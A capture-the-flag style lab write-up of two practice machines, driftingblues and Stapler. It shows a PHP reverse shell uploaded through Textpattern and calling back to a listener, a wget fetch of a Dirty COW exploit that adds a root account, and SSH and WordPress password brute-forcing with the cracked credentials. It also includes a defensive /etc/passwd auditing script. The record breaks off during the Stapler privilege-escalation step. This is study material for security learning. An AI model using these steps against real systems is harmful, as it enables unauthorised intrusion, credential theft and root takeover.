### 4. Login textpattern

![image](https://hackmd.io/_uploads/BycEroq31l.png)

#### 4.1 Articles Page

An article under Articles describes the available features:\
![image](https://hackmd.io/_uploads/rJJM8jq3kg.png)

#### 4.2 Use the file upload

http://192.168.171.219/textpattern/textpattern/index.php?event=file
![image](https://hackmd.io/_uploads/H197Pi9nJx.png)

#### 4.3 Prepare a reverse shell

Use the ready-made [pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) reverse shell:

```
┌──(chw㉿CHW)-[~/Desktop/Tool_upload]
└─$ cat chw_revshell.php
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.45.221';  // CHANGE THIS
$port = 8888;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
...

┌──(chw㉿CHW)-[~/Desktop/Tool_upload]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
```

#### 4.4 Upload and trigger

![image](https://hackmd.io/_uploads/SkwIwjq3yg.png)

The filename check blocks `..`, so the file cannot be pushed into `/var/www/`

![image](https://hackmd.io/_uploads/HJ1rknq3kx.png)

> Failed

However, the storage path can be read straight from the HTML tag\
![image](https://hackmd.io/_uploads/rJ45k29hyx.png)

> Stuffed with a pile of junk 🚮🚮🚮
>
> `<a href="/textpattern/index.php?s=file_download&#38;id=7">chw_revshell_finla.php</a>`

Browse http://192.168.171.219/textpattern/files/ directly and click the uploaded reverse shell\
![image](https://hackmd.io/_uploads/rJ8Hm293kx.png)

```
┌──(chw㉿CHW)-[~/Desktop/Tool_upload]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [192.168.45.221] from (UNKNOWN) [192.168.171.219] 52461
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
 04:36:04 up  3:39,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ bash -i
bash: no job control in this shell
www-data@driftingblues:/home$ ls /home
ls /home
www-data@driftingblues:/home$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
```

>[!Tip] No User Flag ?!
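The `/etc/passwd` dump above answers the question if it is parsed rather than eyeballed: the box has no account in the regular-user UID range, which is why there is no user flag. The same parse also catches what the Dirty COW `/etc/passwd` method used later on this box leaves behind, a second UID 0 entry (`firefart`) whose home is `/root`. The following is an added example, not code from the write-up; it works on a constructed excerpt of that dump plus the `firefart` line printed by the exploit.

```python
"""Audit an /etc/passwd listing: real login accounts, UID-0 and /root anomalies.

Added example for this write-up. SAMPLE_PASSWD is a constructed excerpt of the
driftingblues dump shown above, plus the 'firefart' line that the Dirty COW
/etc/passwd method (steps 6 and 7) writes into the file.
"""
from dataclasses import dataclass

# Shells that do not give an interactive login.
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}


@dataclass
class PasswdEntry:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> list[PasswdEntry]:
    """Parse passwd(5) lines (name:pw:uid:gid:gecos:home:shell), skipping blanks."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            # A malformed line in a tampered file; skip it rather than crash.
            continue
        name, _pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), gecos, home, shell))
    return entries


def regular_users(entries, min_uid=1000, nobody_uid=65534):
    """Human accounts: UID in the regular range (not 'nobody') with a login shell.

    On driftingblues this list is empty, so there is no user home to hold a flag.
    """
    return [
        e.name
        for e in entries
        if e.uid >= min_uid and e.uid != nobody_uid and e.shell not in NOLOGIN_SHELLS
    ]


def uid0_anomalies(entries):
    """Accounts other than 'root' with UID 0, or using /root as their home.

    A second UID-0 entry is the footprint the Dirty COW passwd method leaves.
    """
    findings = []
    for e in entries:
        if e.name == "root":
            continue
        if e.uid == 0:
            findings.append(f"{e.name}: uid 0 (root-equivalent account)")
        elif e.home == "/root":
            findings.append(f"{e.name}: home is /root")
    return findings


def duplicate_uids(entries):
    """Map uid -> account names for every UID shared by more than one account."""
    by_uid = {}
    for e in entries:
        by_uid.setdefault(e.uid, []).append(e.name)
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


# Constructed excerpt of the dump above, plus the line the exploit adds.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
firefart:fi2TcL2BkmbVQ:0:0:pwned:/root:/bin/bash
"""

if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    print("regular users:", regular_users(entries) or "none")
    for finding in uid0_anomalies(entries):
        print("ANOMALY:", finding)
    for uid, names in duplicate_uids(entries).items():
        print(f"duplicate uid {uid}: {', '.join(names)}")
```

Run against a live `/etc/passwd` it is a cheap post-incident check: any name besides `root` in `uid0_anomalies` means the file has been rewritten.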
Probably not a permissions problem (we can already read `/etc/passwd`). Check what we are allowed to do:

```
www-data@driftingblues:/home$ sudo -l
sudo -l
bash: sudo: command not found
www-data@driftingblues:/home$ ls -lah /etc/passwd
ls -lah /etc/passwd
-rw-r--r-- 1 root root 868 Mar 17  2021 /etc/passwd
www-data@driftingblues:/home$ find / -writable -type d 2>/dev/null
find / -writable -type d 2>/dev/null
/run/shm
/run/lock
/run/lock/apache2
/var/www/textpattern/files
/var/lib/php5
/var/cache/apache2/mod_disk_cache
/var/tmp
/proc/3686/task/3686/fd
/proc/3686/fd
/tmp
```

## Privilege Escalation

### 5. searchsploit

```
www-data@driftingblues:/home$ uname -a
uname -a
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
```

```
┌──(chw㉿CHW)-[~]
└─$ searchsploit Linux 3.2.0-4
...
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)        | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)           | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                              | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)        | linux/local/40839.c
...
```

### 6. exploit (Dirty COW, CVE-2016-5195)

Use the Dirty COW race condition to rewrite `/etc/passwd` and create or overwrite an account:

```
┌──(chw㉿CHW)-[~]
└─$ searchsploit -x 40839
  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40839
     Path: /usr/share/exploitdb/exploits/linux/local/40839.c
    Codes: CVE-2016-5195
 Verified: True
File Type: C source, ASCII text

┌──(chw㉿CHW)-[~]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

```
www-data@driftingblues:/home$ cd /tmp
www-data@driftingblues:/tmp$ wget http://192.168.45.221/dirty
www-data@driftingblues:/tmp$ ./dirty
./dirty
Please enter the new password: chw
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi2TcL2BkmbVQ:0:0:pwned:/root:/bin/bash

mmap: 7ffa82462000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'chw'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi2TcL2BkmbVQ:0:0:pwned:/root:/bin/bash

mmap: 7ffa82462000
madvise 0

Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'chw'.
```

### 7. Log in as firefart

```
www-data@driftingblues:/tmp$ su firefart
su firefart
su: must be run from a terminal
www-data@driftingblues:/tmp$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@driftingblues:/tmp$ su firefart
su firefart
Password: chw
firefart@driftingblues:/tmp# id
id
uid=0(firefart) gid=0(root) groups=0(root)
```

So there really is no user flag ?!\
![image](https://hackmd.io/_uploads/H1Otc2qnkl.png)

### ✅ Get Root FLAG

# Stapler

![image](https://hackmd.io/_uploads/HJcDfhT2Jg.png)

## Solution

### 1. Recon

#### 1.1 Nmap

```
┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -p- 192.168.124.148
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-23 12:09 EDT
Stats: 0:02:40 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 12:12 (0:00:06 remaining)
Nmap scan report for 192.168.124.148
Host is up (0.097s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.45.178
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp    open   tcpwrapped
80/tcp    open   http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   pkzip-file  .ZIP file
| fingerprint-strings:
|   NULL:
|     message2.jpgUT
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info:
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 7
|   Capabilities flags: 63487
|   Some Capabilities: LongColumnFlag, Support41Auth, SupportsCompression, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, ODBCClient, InteractiveClient, FoundRows, SupportsTransactions, SupportsLoadDataLocal, Speaks41ProtocolOld, LongPassword, IgnoreSigpipes, ConnectWithDatabase, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: ']r\x10o%\x0E'H\x0D_7\x08#5~fP=S
|_  Auth Plugin Name: mysql_native_password
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data.
If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.95%I=7%D=3/23%Time=67E032ED%P=aarch64-unknown-linux-gnu
SF:%r(NULL,2D58,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\
...
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 2s, deviation: 4s, median: 0s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2025-03-23T16:12:46
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2025-03-23T16:12:47+00:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 198.41 seconds
```

> FTP, HTTP, Samba, SSH, MySQL, and a custom service on 666

#### 1.2 FTP

```
┌──(chw㉿CHW)-[~/Stapler]
└─$ ftp Anonymous@192.168.124.148
Connected to 192.168.124.148.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
550 Permission denied.
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
100% |***********************************************************************************************************************************************************************************************|   107        1.22 MiB/s    00:00 ETA
226 Transfer complete.
107 bytes received in 00:00 (1.05 KiB/s)
```

```
┌──(chw㉿CHW)-[~/Stapler]
└─$ cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
```

#### 1.3 HTTP

Ports `80` & `12380`

```
┌──(chw㉿CHW)-[~]
└─$ dirb http://192.168.124.148/
...
+ http://192.168.124.148/.bashrc (CODE:200|SIZE:3771)
+ http://192.168.124.148/.profile (CODE:200|SIZE:675)

-----------------
END_TIME: Sun Mar 23 13:28:05 2025
```

- Browse http://192.168.124.148/ \
  ![image](https://hackmd.io/_uploads/H1lK2aT3Jl.png)
- Browse http://192.168.124.148/.bashrc \
  ![image](https://hackmd.io/_uploads/ByAS5p6hJg.png)
- Browse http://192.168.124.148/.profile \
  ![image](https://hackmd.io/_uploads/rJ6D9Tanye.png)
- Browse http://192.168.124.148:12380/ \
  ![image](https://hackmd.io/_uploads/Hyx4TpTnye.png)
  > Coming soon page
  >
  >`<!-- A message from the head of our HR department, Zoe, if you are looking at this, we want to hire you! -->`
- HTTPS https://192.168.124.148:12380/ \
  ![image](https://hackmd.io/_uploads/SkNFmRT3yx.png)
  > The page looks different ?!

#### 1.4 Samba

```
┌──(chw㉿CHW)-[~/Stapler]
└─$ smbclient -N -L \\\\192.168.124.148\\

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	kathy           Disk      Fred, What are we doing here?
	tmp             Disk      All temporary files should be stored here
	IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            RED

┌──(chw㉿CHW)-[~/Stapler]
└─$ enum4linux -a 192.168.124.148
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Mar 23 13:06:47 2025

 =========================================( Target Information )=========================================

Target ........... 192.168.124.148
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==========================( Enumerating Workgroup/Domain on 192.168.124.148 )==========================

[+] Got domain/workgroup name: WORKGROUP

 ==============================( Nbtstat Information for 192.168.124.148 )==============================

Looking up status of 192.168.124.148
	RED             <00> -         H <ACTIVE>  Workstation Service
	RED             <03> -         H <ACTIVE>  Messenger Service
	RED             <20> -         H <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> H <ACTIVE>  Master Browser
	WORKGROUP       <00> - <GROUP> H <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1d> -         H <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> H <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ==================================( Session Check on 192.168.124.148 )==================================
...

 ================================( Share Enumeration on 192.168.124.148 )================================

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	kathy           Disk      Fred, What are we doing here?
	tmp             Disk      All temporary files should be stored here
	IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP RED [+] Attempting to map shares on 192.168.124.148 //192.168.124.148/print$ Mapping: DENIED Listing: N/A Writing: N/A //192.168.124.148/kathy Mapping: OK Listing: OK Writing: N/A //192.168.124.148/tmp Mapping: OK Listing: OK Writing: N/A [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* //192.168.124.148/IPC$ Mapping: N/A Listing: N/A Writing: N/A ==========================( Password Policy Information for 192.168.124.148 )========================== [+] Attaching to 192.168.124.148 using a NULL share [+] Trying protocol 139/SMB... [+] Found domain(s): [+] RED [+] Builtin [+] Password Info for Domain: RED [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: Not Set [+] Password Complexity Flags: 000000 ... [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 [+] Enumerating users using SID S-1-5-21-864226560-67800430-3082388513 and logon username '', password '' S-1-5-21-864226560-67800430-3082388513-501 RED\nobody (Local User) S-1-5-21-864226560-67800430-3082388513-513 RED\None (Domain Group) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\peter (Local User) S-1-22-1-1001 Unix User\RNunemaker (Local User) S-1-22-1-1002 Unix User\ETollefson (Local User) S-1-22-1-1003 Unix User\DSwanger (Local User) S-1-22-1-1004 Unix User\AParnell (Local User) S-1-22-1-1005 Unix User\SHayslett (Local User) S-1-22-1-1006 Unix User\MBassin (Local User) S-1-22-1-1007 Unix User\JBare (Local User) S-1-22-1-1008 Unix User\LSolum (Local User) S-1-22-1-1009 Unix User\IChadwick (Local User) S-1-22-1-1010 Unix User\MFrei (Local User) S-1-22-1-1011 Unix User\SStroud 
(Local User) S-1-22-1-1012 Unix User\CCeaser (Local User) S-1-22-1-1013 Unix User\JKanode (Local User) S-1-22-1-1014 Unix User\CJoo (Local User) S-1-22-1-1015 Unix User\Eeth (Local User) S-1-22-1-1016 Unix User\LSolum2 (Local User) S-1-22-1-1017 Unix User\JLipps (Local User) S-1-22-1-1018 Unix User\jamie (Local User) S-1-22-1-1019 Unix User\Sam (Local User) S-1-22-1-1020 Unix User\Drew (Local User) S-1-22-1-1021 Unix User\jess (Local User) S-1-22-1-1022 Unix User\SHAY (Local User) S-1-22-1-1023 Unix User\Taylor (Local User) S-1-22-1-1024 Unix User\mel (Local User) S-1-22-1-1025 Unix User\kai (Local User) S-1-22-1-1026 Unix User\zoe (Local User) S-1-22-1-1027 Unix User\NATHAN (Local User) S-1-22-1-1028 Unix User\www (Local User) S-1-22-1-1029 Unix User\elly (Local User) ``` > `//192.168.124.148/kathy Mapping: OK Listing: OK Writing: N/A`\ `//192.168.124.148/tmp Mapping: OK Listing: OK Writing: N/A` >> user 建立成 user.txt smbclient 查看 share dir ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ cat SMB_Kathy/kathy_stuff/todo-list.txt I'm making sure to backup anything important for Initech, Kathy ┌──(chw㉿CHW)-[~/Stapler] └─$ cat SMB_Kathy/backup/vsftpd.conf # Example config file /etc/vsftpd.conf ... local_root=/etc ... rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key ssl_enable=NO ┌──(chw㉿CHW)-[~/Stapler/SMB_Kathy/backup] └─$ tar -xzvf wordpress-4.tar.gz wordpress/ wordpress/wp-settings.php wordpress/wp-cron.php wordpress/wp-comments-post.php wordpress/wp-activate.php wordpress/wp-admin/ ... ``` > ftp conf 與 一坨 Wordpress #### 1.5 Zip 自定義的 tcp port 666 ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ nc 192.168.124.148 666 > file.zip ┌──(chw㉿CHW)-[~/Stapler] └─$ unzip file.zip Archive: file.zip inflating: message2.jpg ``` ![message2](https://hackmd.io/_uploads/S19Wh6a31e.jpg) >[!Important] > Recon 總結: > 1. http://192.168.124.148:12380/ 可能有用途\ > HR `Zoe` \ > Web Server 可能與 `SMB_Kathy/backup/wordpress` 有關 > 2. 可利用 SMB share folder 上傳 > 3. 
SMB User > 4. `SMB_Kathy/backup/vsftpd.conf`: rsa key > 5. mysql ### 2. Hydra SSH 使用 `enum4linux` 收集到的 user.txt,爆破 SSH ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ cat user.tx peter RNunemaker ETollefson DSwanger AParnell ... ┌──(chw㉿CHW)-[~/Stapler] └─$ hydra -L user.tx -P /usr/share/wordlists/rockyou.txt ... [DATA] attacking ssh://192.168.124.148:22/ [STATUS] 112.00 tries/min, 112 tries in 00:01h, 430331952 to do in 64037:30h, 12 active ``` > 需要好幾天,不太可能 ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ hydra -L user.tx -P user.tx ssh://192.168.124.148 -e nsr ... [22][ssh] host: 192.168.124.148 login: SHayslett password: SHayslett .... ``` > 成功了... ### 3. HTTP Recon 回去看 `https://192.168.124.148:12380/` 與 `http://192.168.124.148:12380/`\ 發現新路徑 ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ dirb https://192.168.124.148:12380/ ... ---- Scanning URL: https://192.168.124.148:12380/ ---- ==> DIRECTORY: https://192.168.124.148:12380/announcements/ + https://192.168.124.148:12380/index.html (CODE:200|SIZE:21) ==> DIRECTORY: https://192.168.124.148:12380/javascript/ ==> DIRECTORY: https://192.168.124.148:12380/phpmyadmin/ + https://192.168.124.148:12380/robots.txt (CODE:200|SIZE:59) + https://192.168.124.148:12380/server-status (CODE:403|SIZE:306) ``` - 瀏覽 https://192.168.124.148:12380/announcements/ \ ![image](https://hackmd.io/_uploads/BkPjdR6nkg.png) > message.txt: `Abby, we need to link the folder somewhere! 
- Browse https://192.168.124.148:12380/robots.txt \
![image](https://hackmd.io/_uploads/SkqONCp2kg.png)
- Browse https://192.168.124.148:12380/admin112233/ \
![image](https://hackmd.io/_uploads/r1C9VR6h1g.png)
- Browse https://192.168.124.148:12380/blogblog/ \
![image](https://hackmd.io/_uploads/ryfbBA62Je.png)
- Browse `view-source:https://192.168.124.148:12380/blogblog/`\
![image](https://hackmd.io/_uploads/ryTEBAp21e.png)
> Possibly related to `SMB_Kathy/backup/wordpress`

This leads to the WordPress login page\
![image](https://hackmd.io/_uploads/r1ysBCphkx.png)
- Browse https://192.168.124.148:12380/phpmyadmin/ \
![image](https://hackmd.io/_uploads/HyBlKAp3kg.png)
> From view-source:https://192.168.124.148:12380/phpmyadmin/ we get
> `https://192.168.124.148:12380/phpmyadmin/doc/html/index.html` \
> ![image](https://hackmd.io/_uploads/HkiY90an1l.png)
>
> phpMyAdmin 4.5.4.1
>
> `searchsploit phpMyAdmin 4.5`: no results

### 4. WPscan

```
┌──(chw㉿CHW)-[~]
└─$ wpscan --url https://192.168.124.148:12380/blogblog/ --enumerate p --plugins-detection aggressive --disable-tls-checks
...
[+] WordPress theme in use: bhost
 | Location: https://192.168.124.148:12380/blogblog/wp-content/themes/bhost/
 | Last Updated: 2025-03-07T00:00:00.000Z
 | Readme: https://192.168.124.148:12380/blogblog/wp-content/themes/bhost/readme.txt
 | [!] The version is out of date, the latest version is 1.9
 | Style URL: https://192.168.124.148:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
 | Style Name: BHost
 | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
...
[+] two-factor
 | Location: https://192.168.124.148:12380/blogblog/wp-content/plugins/two-factor/
 | Latest Version: 0.12.0
 | Last Updated: 2025-02-14T15:58:00.000Z
 | Readme: https://192.168.124.148:12380/blogblog/wp-content/plugins/two-factor/readme.txt
 | [!] Directory listing is enabled
...

┌──(chw㉿CHW)-[~]
└─$ wpscan --url https://192.168.124.148:12380/blogblog/ --enumerate u --disable-tls-checks
[i] User(s) Identified:

[+] John Smith
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By: Rss Generator (Passive Detection)

[+] john
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] garry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] elly
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] peter
[+] barry
[+] heather
[+] harry
[+] scott
[+] kathy
[+] tim
```
> Plugin: `bhost`\
> Users saved to wpuser.txt

Use cewl and brute-force the passwords

```
┌──(chw㉿CHW)-[~/Stapler]
└─$ cat wpuser.txt
John Smith
john
garry
elly
peter
barry
...

┌──(chw㉿CHW)-[~/Stapler]
└─$ cewl -w custom_wordlist.txt https://192.168.124.148:12380/blogblog/

┌──(chw㉿CHW)-[~/Stapler]
└─$ wpscan --url https://192.168.124.148:12380/blogblog/ -U wpuser.txt -P custom_wordlist.txt --force --disable-tls-checks
...
[+] Performing password attack on Xmlrpc Multicall against 11 user/s
[SUCCESS] - tim / thumb
[SUCCESS] - garry / football
```

>[!Important]
>Summary:
>- SSH: `SHayslett:SHayslett`\
>- WordPress: `tim:thumb` & `garry:football`
>
>Attack surface not yet used:
>- WordPress bhost
>- phpMyAdmin login
>- mysql
>- SMB share folder upload
>- `SMB_Kathy/backup/vsftpd.conf`: rsa key

### 5. SSH Login

```
┌──(chw㉿CHW)-[~/Stapler]
└─$ ssh SHayslett@192.168.124.148
...
SHayslett@red:~$ whoami
SHayslett
SHayslett@red:~$ pwd
/home/SHayslett
```

### ✅ Get User Flag
> User flag found under `/home/`

## Privilege Escalation

### 6. Check Users

```
SHayslett@red:/$ ls /home
AParnell  Drew      elly        jamie  JKanode  local.txt  MBassin  NATHAN      Sam        SStroud  zoe
CCeaser   DSwanger  ETollefson  JBare  JLipps   LSolum     mel      peter       SHAY       Taylor
CJoo      Eeth      IChadwick   jess   kai      LSolum2    MFrei    RNunemaker  SHayslett  www

SHayslett@red:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
messagebus:x:108:111::/var/run/dbus:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
AParnell:x:1004:1004::/home/AParnell:/bin/bash
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
MBassin:x:1006:1006::/home/MBassin:/bin/bash
JBare:x:1007:1007::/home/JBare:/bin/bash
LSolum:x:1008:1008::/home/LSolum:/bin/bash
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
MFrei:x:1010:1010::/home/MFrei:/bin/bash
SStroud:x:1011:1011::/home/SStroud:/bin/bash
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
JLipps:x:1017:1017::/home/JLipps:/bin/sh
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
